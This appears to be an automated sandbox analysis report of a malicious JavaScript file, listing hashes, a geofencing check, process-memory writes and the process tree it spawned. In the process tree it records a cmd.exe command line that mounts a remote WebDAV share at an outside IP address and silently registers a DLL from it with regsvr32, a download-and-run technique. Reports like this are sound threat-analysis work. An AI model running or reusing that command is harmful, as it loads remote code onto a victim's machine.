Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 03:02
Static task
static1
Behavioral task
behavioral1
Sample
c324645c039e711d47c98dd7ab3d4f31a5c96b3d84aff7de6285687161339701.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
c324645c039e711d47c98dd7ab3d4f31a5c96b3d84aff7de6285687161339701.js
Resource
win10v2004-20240709-en
General
-
Target
c324645c039e711d47c98dd7ab3d4f31a5c96b3d84aff7de6285687161339701.js
-
Size
4KB
-
MD5
9b9bd29b5986624340bcdaed5660bf17
-
SHA1
bc4e4c57b2b7cf0d5480b2b3c26c05bb9b57efc2
-
SHA256
c324645c039e711d47c98dd7ab3d4f31a5c96b3d84aff7de6285687161339701
-
SHA512
6996f0b1760acd72a60deee04e1064ba65db04a7814b15b6fb55aaebadfb221f6e6083b6b01b3e9762765183d4cfb97755c78b2a8af611157ef7e6a85ca88111
-
SSDEEP
96:Qxnv7pKjNJj0TQf4lBQdn1HElBvfYY/2SA65jdAkEXMnd65jdYnHJ:wviJrT65ZAkL65ZYnp
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2940 wrote to memory of 4588 2940 wscript.exe 85 PID 2940 wrote to memory of 4588 2940 wscript.exe 85 PID 4588 wrote to memory of 2148 4588 cmd.exe 87 PID 4588 wrote to memory of 2148 4588 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c324645c039e711d47c98dd7ab3d4f31a5c96b3d84aff7de6285687161339701.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\204172964725065.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:2148
-
-